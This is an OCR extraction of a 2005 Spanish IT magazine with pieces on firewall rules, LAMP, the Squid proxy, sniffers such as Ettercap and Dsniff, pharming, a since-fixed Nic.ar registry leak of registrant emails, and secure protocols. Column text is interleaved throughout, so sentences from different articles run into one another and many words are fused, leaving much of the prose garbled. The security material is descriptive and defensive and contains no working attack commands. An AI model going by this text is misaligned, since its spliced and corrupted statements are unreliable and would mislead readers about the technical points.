sean necesarios.Con esta arquitectura,permitimos que el servidor sea acce- Todo lo que venga de la IP de la casa del jefe al puerto TCP 1723 = ACEPTAR
sible desde Internet de forma tal que si es atacado y cae bajo dominio ajeno, Todo lo que venga de la red local y vaya al exterior = ENMASCARAR
fig. 3
Windows
FIREWALL
Con el Ser vice Pack 2 de Microsoft, el nuevo PorMarceloC.A.Romeo
Windows Firewall reemplaza al viejo y básico
Internet Connection Firewall que Windows XP
traíaincorporadoensusprimerasversiones.
Fig. 8
Fig. 9
IPtables
Pero esto no es todo. Necesitamos también es-
pecificar a qué chain o cadena vamos a aplicar
esta regla. Para eso está el parámetro -A.
LAMP
PorNuriaPratsiPujol
no significa lámpara en inglés
A
Actualmente en los buscadores más relevancia en el mercado). MySQL es el progra-
populares podemos encontrar que la ma de base de datos más usado [2] (Yahoo y la
palabra LAMP nos da como resultado NASA lo utilizan) y PHP un lenguaje de script-
de la búsqueda, links a webs de de- ing [3] (Python es una alternativa posible [4]).
sarrollo de páginas web. Pero entonces si LAMP
no significa lámpara en inglés ¿qué es? ¿Cuál es Ventajas
su utilidad? ¿Y por qué es tan popular?
Lamp es la plataforma elegida para el desarrol-
lo y ejecución de aplicaciones web de alta per-
Etimologíaysignificado formance. Es sólida y confiable, y si Apache es
un indicador, entonces LAMP predomina. Si
Dada la habilidad de la gente de IT para bauti- uno visita los estudios de Netcraft y busca sitios
zar con abreviaturas (los protocolos, aplica- populares, verá que muchos funcionan bajo
ciones
) era de intuir que LAMP podría ser un Apache sobre Linux y que tienen mod_perl o
anacronismo relacionado con este mundo. En mod_php instalados. Netcraft no puede,
1998 una revista alemana publicó la palabra usando sus metodologías actuales detectar
por primera vez para tratar de popularizar el que sitios usan MySQL. Pero, sabirendo el
uso de programas libres. En el mercado número de bajadas que se han hecho de
siempre se relaciona a Linux con programas MySQL se sabe que es muy popular y que está
libres pero no es el único. Existen muchos otros reemplazando en muchos casos las bases de
programas libres que hacen de Linux una datos propietarias especialmente en el mundo
plataforma sumamente útil. de web-servers).
Podríamos clasificar las páginas webs en dos
CreacionesbajoLAMP
tipos: estáticas y dinámicas. Para albergar Variantes
cualquiera de las dos necesitamos un servidor Te recomendamos la página de
de páginas web. Existen programas libres alternativos para O'ReillydedicadaaLAMP.Allíencon-
Las más sencillas son aquellas que brindan con- reemplazar cualquiera de los de LAMP. Como trarás todas las novedades y ayudas
tenidos HTML que son estáticos (HTML-Hyper sistemas operativos podrían utilizarse los BDS paraquedesarrollestuspáginasweb
Text Markup Language que en castellano que (Free BSD, Open BSD, Net BSD) y en vez de vos mismo con las tecnologías
significa Lenguaje de Marcado de Hiper Texto). MySQL por ejemplo PostGreSQL. En cuanto a LAMP:http://www.onlamp.com
Para desarrollar una página web dinámica se los lenguajes de programación podrían ser Perl
Sin embargo si no sos un experto
requiere que el servidor cree al vuelo, al recibir podesanimarteacreartuspáginasd-
o Ruby en vez de PhP o Python. inámicas (weblogs, etc.) con paque-
del usuario entradas, una secuencia de recolec-
tesbasadosenLAMPquepodesen-
ción, y que procese los datos quizás consultan- Masvariantes
peroconnombrepropio
contrarenlared.
do una base de datos. Finalmente retornará al
navegador del usuario algo procesado acorde a
lo que este entró.Los requisitos para hostearlas Para usuarios que trabajen en otras plataformas NúriaPratsiPujol
es la de tener acceso a lenguajes de scripting y existen alternativas para ejecutar los programas
programas que manejen bases de datos. AMP en otros sistemas operativos (notar que Es consultora en programación
hacemos referencia a la palabra sin la L). web/basededatos.Enlaactualidad
Existen diferentes programas que logran en su realiza su doctorado en Física
conjunto crear éstas últimas. Asi MAMP es la abreviatura de Macintosh Teórica en la Universidad de
En el caso de programas libres, al manojo de Apache MySQL y PhP que trabaja con sistemas Barcelona,España.Selapuedecon-
programas, se los conoce como LAMP. Es decir, operativos Mac OS X. tactarennuriapip@nexweb.com.ar
LAMP es el anacronismo de Pero no es todo porque WAMP es la abreviatu-
L: Linux ra de Windows Apache MySQL y PhP y se
A: Apache trabaja Windows.
M: MySQL Esto significa que a pesar que el concepto de Web-bibliografía:
P: PHP o Phyton. LAMP se promocione por especialmente [1] http://www.apache.org/
Linux es el sistema operativo donde Apache [1] O'Reilly y MySQL como "The Open Source Web [2] http://www.mysql.com/
se ejecuta como servidor Web (es uno de los Platform" el conjunto AMP puede ser explota- [3] http://www.php.net/
primeros programas libres que ha obtenido do en otros sistemas también. [4] http://www.python.org/
A
Actualmente, un administrador de Por lo general un proxy se utiliza para que los es actuar como proxy reverso. Ésto consiste en
red no puede diseñar la imple- usuarios accedan a páginas de Internet; para una salida para servidores de aplicaciones, y
mentación de los servicios para sus ello configuran el nombre del proxy en sus permite publicar servicios de otro servidor.
usuarios sin pensar en utilizar browsers, y el puerto adonde deben enviar los Como con un proxy standard, un proxy reverso
proxies. Tanto desde el punto de vista eco- requerimientos. Una vez que el pedido de una puede servir para mejorar la performance de
nómico como desde la seguridad, son muy im- URL llega al proxy, éste lo resuelve localmente los servicios de Interntet utilizando un Cache,
portantes a la hora de construir una red. Estos o lo reenvía al servidor verdadero. de tal forma que se pueda hacer una especie de
servidores interceptan los pedidos de los En muchos casos este esquema es más que su- "espejo" del servidor principal. La razón más
clientes de una aplicación, y verifican si pueden ficiente, pero en otros escenarios puede importante para instalar un proxy reverso es
completar el pedido ellos mismos. Si no suceder que el administrador quiera que los controlar el acceso desde Internet hacia servi-
pueden, reenvían el pedido al servidor real usuarios salgan a Internet por proxy aunque dores que están detrás de un firewall.
para que complete el requerimiento. no lo configuren explícitamente en sus Squid se puede configurar como proxy con-
El propósito de este mecanismo es mejorar la browsers, o quizás no quiere que los usuarios vencional, transparente o reverso; soporta
performance de la aplicación reduciendo los sepan que están accediendo a la Web a través FTP, Gopher y HTTP.
tiempos de respuesta, y controlar el tráfico de un proxy o sencillamente quiere evitarse el Además soporta SSL, control de acceso y re-
hacia Internet, ya sea por ancho de banda o trabajo de configurar la salida a Internet en portes de todas las actividades. Utilizando un
control de acceso. cada PC. De esta manera aparece el concepto protocolo llamado ICP (Internet Cache
El control del ancho de banda es muy venta- de proxy transparente. Con este tipo de confi-- Protocol), puede compartir información de
joso para abaratar los costos de conexión, ya guración, se interceptan los requerimientos de Cache entre varios servidores para
que cuando se tiene un proxy se necesitan los usuarios de tal forma que al cliente le aprovechar el ancho de banda disponible.
menos accesos a Internet para satisfacer las parezca que accede al servidor original, Cuando Squid está operando en un servidor,
necesidades de la misma cantidad de usuarios. cuando en realidad está pasando por un proxy. consiste en un proceso principal que se llama
Los propios servidores de aplicaciones en Para que un servidor Linux actúe como proxy "squid", un proceso para hacer búsquedas de
Internet, se ven aliviados porque cierta parte transparente, se debe configurar como router nombres ("dnsserver"), programas op-
de su trabajo es realizada por otras máquinas y e instalar Squid. cionales para reescribir pedidos y autenticar,
que interceptan las conexiones de los clientes. Otra de las funciones alternativas de un proxy, y aplicaciones de administración.
InstalandoSquid debidoasucompatibilidadconnumerosos
estándaresylaimplementacióndeprotoco-
Squid generalmente se distribuye desde su
página oficial (www.squid-cache.org) en losdejerarquíasdeCacheybalanceode
forma de archivos fuente, para que el usuario
lo compile y lo instale para su propio sistema carga(ICP,HTCP,CARP).
operativo. Esto es muy recomendable porque
cada sistema operativo puede estar configu-
rado de una manera diferente aunque tenga
la misma versión. En vez de disponer recursos
para generar los binarios, los desarrolladores
tratan de hacer el código fuente lo más
portable posible. De todas formas, algunos
voluntarios ofrecen binarios para distintos
sistemas operativos, como por ejemplo:
RedHat, Debian , FreeBSD, NetBSD, Windows
NT y XP, que también se pueden conseguir en
la página de Squid.
Luego de obtener el programa y compilarlo, se
instala de acuerdo a la plataforma.
Una vez instalado, hay que hacer pocas con-
figuraciones básicas para que funcione de
manera correcta. Se debe tener en cuenta que
si hay firewalls en la red, se debe abrir el
puerto correspondiente para que los clientes
accedan al proxy, y también permitir al servi-
dor la salida a Internet.
El archivo de configuración del programa se
llama "squid.conf", y varía su ubicación de
acuerdo a la plataforma y la forma de instalar. pueda escribir en el directorio de Cache y en el Fig. 2 - Webalizer -
En Linux se puede encontrar en de Logs. Resumen de las visitas por sitio
"/usr/local/squid/etc/squid.conf".
Por lo general, hay que sacar el signo "#" de co- Cuando se termina de editar el archivo de con-
mentario a las líneas donde figuren las sigu- figuración, hay que crear los directorios de
ientes etiquetas y completar con los valores Swap del Cache. Para eso se ejecuta el
necesarios: comando "squid" con la opción "-z"; por
ejemplo para Linux:
cache_dir: Es el directorio en donde se van a
guardar los cache; se necesita un espacio en /usr/local/squid/bin/squid -z
disco considerable.
Una vez que se terminan de crear los directo-
http_port: El puerto 3128 es el que trae por rios de Swap, se inicia el programa con el sigu-
defecto. iente comando:
PorLuísOtegui
Laprehistoria:
delastarjetasperforadasa80x25
Dimecuantosteusan...
...ytediréquiénesteatacan
Unacaracterísticadelamayorpartededelos
programas desarrollados en comunidad, ya
seansoftwarelibreocódigoabierto,esqueson
naturalmente más seguros y suelen estar más
limpiosdefallas.Peroesonoloseximedeser
atacados,comocualquierhijodevecino.
M
ás de una vez hemos discutido con la gente world.com/securitytopics/security/story/0,10801,10054 Ricardo D. Goldberger
del ambiente de software libre y del código 1,00.html), en el que demuestra que los browsers de Periodista científico especial-
abierto y también de la industria propietaria, Mozilla.org (Mozilla y Firefox, principalmente) están izado en Informática y Nuevas
las razones por las cuales aparecen las distin- siendo, cada vez más, blanco de los ataques. Tecnologías. Produce el
tas vulnerabilidades en las diferentes aplicaciones. Algunos de los datos del informe indican que entre julio newsletter electrónico T-knos,
Una de las cosas que a veces no se remarca lo suficiente, y diciembre de 2004 se documentaron 21 vulnerabili- conduce "El Explorador
Federal" por AM Radio El
es que casi el 90% de esas vulnerabilidades son encon- dades que afectan a la familia de Mozillas, contra 13 que
Mundo y colabora en Gillespi
tradas por gente que va a buscarlas específicamente. afectan al Internet Explorer. O sea, por primera vez en su Hotel, en FM Rock & Pop.
Dicho de otra manera, lo que habitualmente suele ser un historia, los browsers libres pasaron al frente de la lista
error de programación, en la mayor parte de los casos in- de debilidades. La buena noticia es que, en cambio, pro-
voluntario (aún cuando no se descarta cierto grado de porcionalmente, la vulnerabilidades de Internet Explorer
negligencia), sólo se encuentra porque hay grupos de in- son más críticas que las de Firefox: 9 de 13 para Internet
dividuos especialmente dedicados a buscarlas. Explorer contra 11 de 21 para Firefox. Además, la vulner-
Más de una vez hemos dicho, también, que el hacker, hoy abilidades de Internet Explorer han tardado más en ser
en día, ya no es ese adolescente sucio, desprolijo, rodeado corregidas (43 días) que las de los Mozilla (26 días).
de cajas vacías de pizza, con ansias de figurar. Hoy en día Alfred Huger,el director de ingeniería de Symantec,afirmó,
son señores profesionales (que incluso trabajan en muy suelto de cuerpo,que "estamos empezando a ver que
equipo) y cuya tarea, cada vez más, tiene un fin eminen- Firefox y Mozilla están atrayendo más la atención de los a-
temente lucrativo.Puede ser tanto conseguir una base de tacantes, y seguramente va a continuar así
" Y concluyó
datos como bloquear las transacciones de un sitio web, contundente: "La gente que escribe troyanos y gusanos
tanto robar identidades para cometer fraudes y estafas para ser distribuidos a través de la vulnerabilidades de los
como realizar espionaje industrial. browsers, están buscando el máximo rendimiento". Por
Es más, estos distintos grupos compiten entre sí e, supuesto, como máximo rendimiento, léase máximo daño
incluso, terminan guerreando entre ellos, como el caso de Este estudio contiene más cifras de las que comentamos,
los grupos rusos A 29 y Skynet, que incluyen entre sus varias de las cuales son, por lo menos, preocupantes.
códigos maliciosos instrucciones para desactivar o elimi- Pero lo que más me interesa destacar en esta nota, es
nar código de la competencia. que aquello que sosteníamos de que los sistemas opera-
La conclusión de esto es que los ataques y la búsqueda de tivos y las aplicaciones libres serían igualmente atacadas
vulnerabilidades ya no van tan dirigidas a ciertos sistemas que las otras, el día de que sean lo suficientemente po-
operativos específicos, o a atacar a la calidad de los pro- pulares, no era una conspiración contra el software libre
ductos de una determinada compañía, sino que per- o el código abierto, o una campaña de FUD (Fear,
siguen objetivos definidos, independientemente de las Uncertainty and Doubt) sino una hipótesis que está
aplicaciones y plataformas a las que deban asaltar. comenzando a confirmarse.
Precisamente, una de las razones por las cuales los Para ser honestos, a esta altura de la soireé, importa poco
hackers están a la pesca de vulnerabilidades en ciertos y si las vulnerabilidades están en un Windows, en un Linux,
determinados programas, es su popularidad: de nada en un Firefox,o en un MS Office
cuántas más haya,más
vale atacar uno que no conoce nadie, o que no usa nadie, demanda de software de seguridad va a haber. Por
especialmente en el ámbito corporativo. Es más, la clave supuesto, de ahí no se puede inferir que las empresas
no sólo es la popularidad sino la calidad de la informa- productoras de software de seguridad sean responsables
ción que se transmite a través de esas aplicaciones. de las vulnerabilidades.
La consecuencia directa de esto es que, a medida que Pero una cosa sí es cierta: si bien por diseño mucho del
los programas alternativos a los propietarios se software libre y del código abierto es más seguro, deja
vuelvan cada vez más populares, serán, cada vez más, menos flancos descubiertos, y es un poco más inmune
blanco de los ataques. que otro tipo de software, lo cierto es que no es total-
Una demostración de que esto es cada vez más así, es un mente vulnerable.Y eso es lo que los diseñadores de este
informe que publicó Symantec y que Jaikumar Vijayan tipo de programas deberían tener en cuenta a la hora de
analizó para Computerworld (http://www.computer- sentarse a descansar en sus laureles.
HACKING VoL.3
Imágen: © 2005 Hemera Technologies Inc.
Sniffers 60
Pharming 62
Casonic.ar 64
ComunicacionesSeguras 68
HackingUnixPaso7 76
Netcat,lanavajasuiza 78
/ NEX - 59|
ETHICAL HACKING - FUNDAMENTOS
¿Quéesunsniffer?
¿Quéherramientasexistenparamonitoreareltráficodenuestrared?Los
SINIFFERS (una traducción exacta para este contexto no es fácil pero
queda resumido por: olfatear, rastrear, husmear) hacen justamente eso:
capturanlainformacióndenuestraLAN.Conozcamosquéhacenycuáles
sonlosmásusadosdentrodelmundoOpenSource.
SNIFFERS
|60 - NEX / Revista de Networking y Programación
¿Cómoprevenirelsniffing? *Dsniff: Una herramienta utilizada para sniffe-ar una red y encontrar
tráfico en texto plano. Incluye varias aplicaciones para escuchar y crear
El mejor método es segurizando nuestra red usando métodos de en- tráfico de red.
criptación. Mientras que esto no va a prohibir que nadie nos registre el
tráfico, va a evitar que entiendan lo que capturen. *Snort: Es la herramienta a la hora de usar un NIDS y tener un control de
lo que esta pasando en nuestra LAN. Está discutida en detalle, corriendo
*SSH: El estandar para administración remota de equipos *nix o *bsd bajo Windows y bajo Linux, en NEX IT Specialist #13, pags 68 y 70, Marzo
es a través del Secure Shell. El SSH espera primero la validación de 2005, respectivamente
ambos equipos para pedir usuario y password, TODA la transferencia
es encriptada. Hay dos protocolos para este tipo de comunicaciones, *Ettercap: Si pensaban que tenían una red segura por usar un switch,
tengamos presente en estar usando la versión 2 y no la versión 1 que estan equivocados. El ettercap es una herramienta muy poderosa que
trae problemas similares a los que trae el telnet. Si bien es encripta- nos permite tomar el control total de una LAN.
do, es muy sencillo desencriptar..
*Kismet: Si tienen una placa wifi no pueden dejar de probar esta herra-
*VPN: Encriptar los datos en una Red Privada Virtual para transmitir mienta. Es la herramienta por excelencia a la hora de hacer sniffing en
datos seguros entre dos redes. Pero con una aclaración importante, redes inalámbricas. Puede emitir sonidos al descubrir una red e inclusive
obviamente si alguno de los nodos es comprometido con algún registrar la ubicación usando un gps.
troyano, el tráfico vuelve a estar comprometido. Hay varios niveles de
encriptación y tipos de VPN. Conclusión
*SSL: Secure Sockets Layer, SSL esta incluido en muchos servicios ac- Existen demasiadas herramientas que pueden perjudicar la seguridad en
tuales, como web, smtp, pop3. Es lo que se usa cuando se hace una trans- una red LAN. Confiemos o no en nuestros empleados, es imposible tener
misión web en modo seguro. Como cuando hacemos una compra con un control total de la situación. Lo ideal es tomar la mayor cantidad de
tarjeta de crédito por Internet o como cuando miramos los mails en medidas de seguridad posible, desde encriptar los mails hasta establecer
Hotmail.Una aclaración,NO cuando ingresamos el usuario y password en conexiones seguras via SSL. Pero para cualquiera sea el caso, es funda-
Hotmail, sólo cuando los leemos. mental conocer las herramientas que hay disponibles para conocer los
posibles ataques que nos podemos encontrar. Herramientas como el et-
*GNUPG: Los emails pueden ser sniffeados de muchas formas diferentes. tercap simplemente son inaceptables en una red lan y equipos en modo
Puede que ni siquiera hayan sido sniffeados, sino que fueron logueados promiscuo comprometen seriamente la privacidad de una LAN.
por un servidor corporativo que registra el tráfico.La mejor forma de ase-
gurar nuestro tráfico es encriptándolo con PGP (Pretty Good Privacy). eth0 Link encap:Ethernet HWaddr 52:54:05:F3:95:01
Para PGP existe la alternativa open source GNUPG. Podemos utilizar Fig. 1
gnupg en la mayoría de los clientes de correo open source.
eth0 Link encap:Ethernet HWaddr 52:54:05:F3:95:01
¿Quéaplicaciones inet addr:192.168.0.200 Bcast:203.199. ...
UP BROADCAST RUNNING MULTICAST MTU:1500 ...
haydisponiblesenLinux
parausardesniffer? Fig. 2
*Ethereal: Siendo una aplicación gráfica es una aplicación que tiene eth0 Link encap:Ethernet HWaddr 52:54:05:F3:95:01
muchos adeptos. Analiza el tráfico de una red y nos da la posibilidad de inet addr:192.168.0.200 Bcast:203.199. ...
usar filtros para buscar lo que queramos. Ideal para encontrar problemas UP BROADCAST RUNNING PROMISC MULTICAST ...
de red o protocolos. Fig. 3
ETHICAL HACKING - FUNDAMENTOS
PHARMING
Los hackers están intentando, cada vez más, obtener beneficios económicos de
susactuacionesydelmalwarequecrean.Sihastaahoraunodelosfraudesmás
Nueva técnica de fraude
PorFernandodelaCuadra
extendidoseraelphishing,consistenteenengañaralosusuariosparaqueefec- EditorTécnicoInternacional
túenope-racionesbancariasenser vidoreswebconelmismodiseñoqueunbanco PandaSoftware(http://www.pandasoftware.es/)
online,elpharmingentrañaaúnmayorespeligrosqueelphishing. E-mail:fdelacuadra@pandasoftware.es
B
Básicamente, el pharming consiste a su servicio bancario. De esta manera, el ata- debe ser, al menos en un primer frente de pro-
en la manipulación de la resolu- cante no debe estar pendiente de un ataque tección, una solución reactiva, sino que deben
ción de nombres en Internet, lle- puntual, como hemos mencionado antes. instalarse sistemas mediante los cuales se de-
vadas a cabo por algún código ma- La solución para esta nueva técnica de fraude tecten no los ficheros en función de firmas
licioso que se ha introducido en el equipo. pasa, de nuevo, por las soluciones de seguridad víricas, sino las acciones que se llevan a cabo en
Cuando un usuario teclea una dirección (como antivirus. Las acciones necesarias para llevar a el ordenador. De esta manera, cada vez que se
puede ser www.pandasoftware.com),ésta debe cabo el pharming necesitan efectuarse por intente realizar un ataque al sistema de DNS
ser convertida a una dirección IP numérica, alguna aplicación en el sistema a atacar (puede del ordenador (como es el caso de las aplica-
como 62.14.63.187. Esto es lo que se llama res- ser un fichero exe, un script, etc.). Pero antes de ciones para pharming), sea reconocido el
olución de nombres, y de ello se encargan los poder ejecutarse esta aplicación, debe llegar al ataque y detenido,así como el programa que lo
servidores DNS, siglas que corresponden a sistema objetivo, evidentemente. La entrada ha llevado a cabo, bloqueado.
"Domain Name Server". En ellos se almacenan del código en el sistema puede ser a través de Sin embargo, existe un peligro añadido a esta
tablas con las direcciones IP de cada nombre de múltiples vías, tantas como entradas de infor- nueva técnica de pharming, que reside en los
dominio. A una escala menor, en cada orde- mación hay en un sistema: el e-mail (la más fre- servidores proxies anónimos. Muchos usuarios
nador conectado a Internet hay un fichero en el cuente), descargas por Internet, copias desde desean ocultar su identidad (su dirección IP) a
que se almacena una pequeña tabla con un disco o CD, etc. En todas y cada una de estas la hora de navegar, por lo que utilizan servi-
nombres de servidores y direcciones IP, de entradas de información, el antivirus debe de- dores proxy instalados en Internet que llevan a
manera que no haga falta acceder a los DNS tectar el fichero con el código malicioso y eli- cabo la conexión con la IP del servidor en lugar
para determinados nombres de servidor, o minarlo, siempre que se encuentre detectado de la IP del cliente. En el peor de los casos, uno
incluso para evitarlo. como una aplicación dañina dentro del fichero de estos servidores proxy puede tener la reso-
El pharming consiste en modificar este sistema de firmas de virus del antivirus. lución de nombres alterada, de manera que los
de resolución de nombres, de manera que Desgraciadamente, hoy en día nos movemos usuarios que intenten entrar en su página ban-
cuando el usuario crea que está accediendo a en un escenario en el que el malware ha caria - a pesar de que su sistema local está per-
su banco en Internet, realmente está accedien- adquirido una velocidad de propagación muy fectamente asegurado- sean redirigidos por el
do a la IP de una página web falsa. elevada, y los creadores son más y ofrecen al proxy a una página con el mismo diseño y a-
El phishing debe su éxito a la ingeniería resto de la comunidad hacker los códigos pariencia de su banco, pero falsa. También po-
social, aunque no todos los usuarios caen en fuente para que introduzcan variaciones y dríamos pensar, siendo más positivos, que el
estos trucos y su éxito está limitado. Y puedan crear ataques nuevos. Los laborato- servidor proxy ha sufrido algún tipo de ataque
además, cada intento de phishing se debe rios de virus no tienen tiempo suficiente para que altere su sistema de resolución de
NIC.ar
caso
L
a seguridad de la información tiene ción de los datos personales establecido por la
tantas aristas como las tiene el modo de Ley 25.326 y reglamentado por el Decreto Detallestécnicos
confeccionar un análisis de riesgo e im- 1558/2001, también conocido como "Habeas
plementar la totalidad de sus partes Data", basado en el derecho reconocido por el No se requerían demasiadas habilidades para
sobre un gran objetivo determinado, a veces art. 43 de la Constitución Nacional, permite que obtener los mails de las personas responsables
tantas, que algunos responsables en el trayecto los ciudadanos ejerzan un legítimo poder de de los sitios, ya en el año 2002 denuncié que
subestiman pequeños detalles. disposición y control sobre sus datos personales. podían solicitarse casi de la misma manera los
Principios de la seguridad informática: A tal fin,los faculta a decidir cuáles de esos datos mails de las entidades... en este caso solo
Disponibilidad, integridad y confidencialidad, quieren proporcionar a terceros, sea el Estado o bastaba con loguearse como una persona -
este ultimo componente delicado o sensible de un particular, o qué datos pueden esos terceros correo y dominio - y luego ir a a tramitar el
muchas empresas, corporaciones y personas recabar,permitiendo asimismo que sepan quién cambio de persona... por alguna persona de la
de nuestro país, ha estado expuesto desde el posee sus datos personales y para qué, pudien- que queriamos saber el mail.
lugar que pocos se imaginaban: nuestro sitio do inclusive oponerse a esa posesión o uso." Completandose este trámite,nos llegaba un mail
de registro Nic.ar para dominios nacionales, Nic.ar, aclara desde su sitio y más exactamente (como es costumbre) para reenviar a Nic.ar, que
.com.ar, .org.ar, net.ar .gov.ar y otros, a cargo de desde Preguntas Frecuentes, luego viendo la contenía la casilla de correo de la persona en
la Cancillería Nacional (Ministerio de relaciones seccion "De las Normas y procedimientos" dice cuestión...por supuesto que jamás seria reenvia-
exteriores, comercio internacional y culto) o en su punto numero 42: do, solo era con motivos de research de informa-
mas conocido como Network Information "Necesito comunicarme con una persona re- ción o toma de datos sensibles.
Center Argentina: Nic.ar. sponsable de un dominio ¿me podrían facilitar Hurgando algo más se podiaa saber a que
La filtración de datos sensibles, como en el caso su e-mail? Respuesta: NIC Argentina * no* pro- persona pertenecían determinados mails y si
que voy a detallar a continuación, no se da a porciona esta información a terceros." fuera por el casi anónimo sistema de envio de
través de su sistema operativo,no es posible de- Lamento decir que * si* proporcionó esa infor- Fax, no habría limites en cuanto a tramitación
tectar esta vulnerabilidad a través de un mación durante años hasta hace 4 dias, no solo fraudulenta.
scanner u otra herramienta de pen-test autom- dio a terceros el mail de las entidades respon- Lo que más llama la atención no es el sistema
atizada, sino burlando el sistema de registro y sables, sino tambien el de las personas respon- por demás de inseguro y obsoleto de trámites
consulta, basándose en la confianza - distrac- sables del dominio, violando asi tanto Habeas que libraba información sensible violando
ción, incapacidad u omisión - del analista o pro- Data, como todo a lo que referia en resguardo y normas de confidencialidad o Habeas Data,
gramador - que hace 10 años o más, diagramó confidencialidad de nuestros datos. sino el impacto que este sin fin de descuidos
e implementó el ya casi obsoleto sistema de *Importante: Cabe destacar que esta falla está tendrían y tendrán de seguir asi, en las enti-
registro - al no tener en cuenta la primera ley arreglada al dia de la fecha, dado a que interac- dades y personas... y porque no en muchos
del desarrollador Web en cuanto seguridad: túe con su personal administrativo para que otros usuarios de internet.Veamos el porque.
"Jamás confíes en que, la totalidad de los usua- ello ocurriera.
rios o visitantes van a introducir los datos correc- From: Nic-Argentina <info@nic.ar> DelitosInformaticos
tos o esperados dentro de un formulario online" Reply-To: info@nic.ar
To: Carlos Tori La información sensible - en este caso el mail
Somosesclavosdelasleyes Date: Apr 5, 2005 11:31 AM personal, institucional o corporativo del regis-
parapoderserlibres.Cicerón. Subject: Re: Para Horacio, Pablo o Isabel... trante de un dominio - enviado al que lo so-
licite sin más, o bien en manos de un potencial
Acerca de Habeas Data: "El régimen de protec- MUCHAS GRACIAS por tu cooperación! Horacio. delincuente con algunos conocimientos de se-
Cuando se diseñó Internet, sus creadores no ad- datos personales en máquinas accesibles por
virtieron la necesidad de transmisiones seguras red, información bibliográfica, e incluso actual-
con sus protocolos. De hecho ni TCP/IP ni HTTP mente muy utilizado para revisar y/o retocar las
proporcionan un método para codificar y prote- configuraciones de equipos como routers, etc.
ger las transmisiones individuales. Los dise- Su mayor problema es de seguridad, ya que
ñadores originales de HTTP crearon el protoco- todos los nombres de usuario y contraseñas
lo como método para comunicar información necesarias para entrar en las máquinas viaja-
multimedia como gráficos, video, sonido, ban por la red sin cifrar (es decir en texto claro).
etcétera. Los diseñadores de la Web no se Esto permite que cualquiera que espíe el
dieron cuenta, ni tampoco tenían razón alguna tráfico de la red pueda obtener los nombres de
para esperarlo, de que HTTP se convertiría en el usuario y contraseñas, y así acceder a todas
núcleo central de una increíble cantidad de esas máquinas. Dejó de usarse casi totalmente
aplicaciones comerciales. Mientras la gente hace unos años, cuando apareció y se popula-
comenzaba a utilizar la Web para el co-mercio, rizó el SSH, que puede describirse como una
las empresas y los usuarios reconocieron la versión cifrada de Telnet. Como medida extra
necesidad de transacciones seguras de un de seguridad, deberíamos deshabilitar el
extremo a otro, en lugar de las transacciones in- puerto correspondiente si es que no hacemos
seguras saltando de un lado a otro como es la uso de dicho protocolo: su puerto es el 23.
comunicación habitual de la Web.
RemoteLogin
SERVICIOS DE COMUNICACIONES
INSEGUROS Al igual que la utilidad TCP/IP telnet, en sis-
temas operativos UNIX se utiliza el comando
Telnet rlogin (remote login - login remoto) para es-
tablecer una sesión de login desde otra
Telnet es el nombre de un protocolo (y del pro- estación de trabajo UNIX remota. Telnet
grama informático que implementa el cliente) siempre pedirá un nombre de usuario y con-
que permite acceder a otra máquina mediante traseña. Aunque rlogin puede configurarse de
una red TCP/IP, para manejarla como si estu- modo tal que no se requiera contraseña como
viéramos sentados frente a ella. Para que la una conveniencia para los usuarios, el nombre
conexión funcione, como en todos los servicios de usuario y contraseña son también transmiti-
de Internet, la máquina a la que se accedía dos sin encriptación.
debe tener un programa especial que reciba y Hacer login remotamente a una estación de
gestione las conexiones. trabajo es útil bajo las siguientes circunstancias:
Sólo sirve para acceder en modo terminal, es - Para acceder a información en otra estación de
decir, sin gráficos, pero fue una herramienta trabajo que no esté disponible de otro modo.
muy útil para reparar fallos a distancia, sin - Para acceder a la estación de trabajo de un
necesidad de estar físicamente en el mismo usuario remotamente para leer el correo.
sitio que la máquina que los tenía. También se - Para "matar" un proceso que ha ocasionado que
usaba para consultar datos a distancia, como la estación de trabajo del usuario se cuelgue.
Cuandotransmitimosinformaciónporunared,
noestamosexentosdeserespiados.Seapor
diversiónoconfinesespecíficosnospueden
estarvigilandomientrashacemostransacciones
víaInternet.Sepacómofuncionanlosprotocolos
deseguridadmásutilizados. Por Leonel F. Becchio
IPsec y VPN deberían estar contenidas en este
artículo. Pero, ya han sido estudiados en detalle
en "NEX IT Specialist # 14, Marzo 2005.
Referimos al lector a las páginas 52 a 59 para
VPN y 45 a 50 para IPsec.
Fig. 2 - S-HTTP
CómoaseguraSSLlas
conexionesdeextremoaextremo
Correo Seguro
MIME&S/MIME
MIME es la abreviatura de Multipurpose que éste carece. S/MIME (Secure / 2. Firma digital DSA. La clave de verificación de
Internet Mail Extensions, cuya traducción Multipurpose Internet Mail Extensions) es un firma es de 1024 bits. Esto garantiza la integri-
podría ser Extensiones Multipropósito de protocolo que agrega firmas digitales y en- dad de un mensaje y la autenticidad de la di-
Correo en Internet. Se trata de una especifi- criptación a MIME. El cuerpo MIME transporta rección de respuesta.
cación para darle formato a mensajes no ASCII un mensaje codificado en PKCS-7. El estándar 3. SSL. El mensaje viaja a lo largo de un canal
para poder ser enviados a través de Internet.. actual es S/MIME versión 3 . seguro donde es adicionalmente encriptado.
Los mensajes de correo poseen dos partes: la Existen varias empresas que comercializan La longitud de la clave de encriptación es de
cabecera del mensaje, que contiene unos casillas de correo seguras. Por ejemplo la firma hasta 1024 bits.
campos estructurados conteniendo informa- S-Mail brinda casillas cuya protección se basa Para mayor información visite www.s-mail.com
ción esencial para la transmisión del mensaje, y en tres niveles principales: Otra alternativa es la que ofrecen empresas
el cuerpo del mismo totalmente desestructura- 1. PGP. El mensaje es encriptado con una clave como Digi-Sign que comercializa números de i-
do a menos que se encuentre en formato de sesión de 128 bits generada aleatoriamente dentificación Digi-IDs que son identificadores
MIME. Muchos clientes soportan ahora MIME la cual se encriptada con la clave de 2048 bits personales únicos que permiten a los individu-
ya que les permite enviar y recibir gráficos, del destinatario. os estar irrefutablemente ligados a sus ac-
audio, y video a través del sistema de correo en
Internet. Adicionalmente MIME soporta el
envío de mensajes en otros conjuntos de carac-
teres además de ASCII. Asimismo los explo-
radores también soportan varios tipos MIME, lo
que les permite mostrar archivos que no estén
en formato HTML.
Una nueva versión, llamada S/MIME, nace
para brindarle a MIME el servicio de seguridad
obtieneenunaredcableada.Debidoa
vulnerabilidadesendichoprotocolo,se
haimplementadoelprotocoloWPAque
trabaja con claves que caducan luego
de un tiempo de estar activadas. Lo
bueno de esta implementación es que
no necesita de una actualización de
hardwaresinodesoftware.Másrecien-
tementeexisteWPA2quemejorayex-
tiendelascualidadesdeWPA.
Fig. 5
Fig. 6
HACKING
UNIX
Parte 2 de 2: Acceso Remoto: usando "reverse telnet"
(Parte 1 de este artículo en NEX IT Specialist # 14, pag 70, Marzo 2005).
